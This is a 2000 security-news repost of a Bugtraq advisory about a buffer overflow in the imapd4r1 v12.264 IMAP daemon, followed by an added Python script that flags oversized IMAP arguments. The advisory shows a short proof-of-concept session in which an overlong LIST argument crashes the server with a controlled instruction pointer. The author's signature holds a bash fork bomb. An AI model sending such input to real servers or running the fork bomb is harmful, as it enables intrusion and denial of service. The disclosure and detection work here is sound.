Originally Published: Monday, 17 April 2000
Author: Alexander Reelsen
Published to: news_enhance_security/Security News

imapd4r1 v12.264 exploit

The IMAP daemon shipped with the newest Red Hat release has a security hole that allows an intruder to get shell access to the mail account.


From: Michal Zalewski
Subject: imapd4r1 v12.264
To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*sigh*

Privileges seem to be dropped, but, anyway, it's a nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need a code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
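
An added example, not part of the original post or of the imapd code: a Python check that a filtering proxy or log reviewer could run over client command lines to flag arguments like the oversized LIST mailbox name in the transcript above, including one announced as an IMAP literal. The 1024-octet limit, the 64-octet filler threshold and the function names are assumptions chosen for the example; the sample session is constructed.

```python
import re

MAX_ARG_LEN = 1024  # assumed per-argument policy limit, in octets
FILLER_MIN = 64     # assumed length at which a one-byte run is worth a flag
# One argument: a quoted string (with backslash escapes) or a bare atom.
_ARG = re.compile(rb'"((?:[^"\\]|\\.)*)"|([^\s"]+)')
_LITERAL = re.compile(rb'^\{(\d+)\+?\}$')  # {n} / {n+} literal announcement


def inspect_command(line, max_arg_len=MAX_ARG_LEN):
    """Parse one client command line; return (tag, command, findings)."""
    parts = line.rstrip(b"\r\n").split(b" ", 2)
    if len(parts) < 2:
        return None, None, ["malformed command line"]
    tag, command = parts[0], parts[1].upper()
    name = command.decode("ascii", "replace")
    findings = []
    args = parts[2] if len(parts) == 3 else b""
    for pos, m in enumerate(_ARG.finditer(args), 1):
        quoted = m.group(1) is not None
        arg = m.group(1) if quoted else m.group(2)
        lit = None if quoted else _LITERAL.match(arg)
        # A literal declares its size before the data arrives: check that.
        size = int(lit.group(1)) if lit else len(arg)
        if size > max_arg_len:
            findings.append(f"{name} arg {pos}: {size} octets > {max_arg_len}")
        elif len(arg) >= FILLER_MIN and len(set(arg)) == 1:
            # Same shape as the transcript's filler, but under the limit.
            findings.append(f"{name} arg {pos}: {len(arg)} identical octets")
    return tag, command, findings


def scan_session(lines):
    """Collect findings for every client line of one session."""
    return [f for line in lines for f in inspect_command(line)[2]]


# Constructed sample session (not captured traffic).
SESSION = [
    b'1 login user pass\r\n',
    b'2 list "" INBOX\r\n',
    b'3 list "" ' + b"A" * 4000 + b"\r\n",
    b'4 list "" {4000}\r\n',
    b'5 list "" ' + b"A" * 100 + b"\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SESSION):
        print(finding)
```

A check like this only narrows exposure in front of an unpatched daemon; the bounds error itself still has to be fixed in the server.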




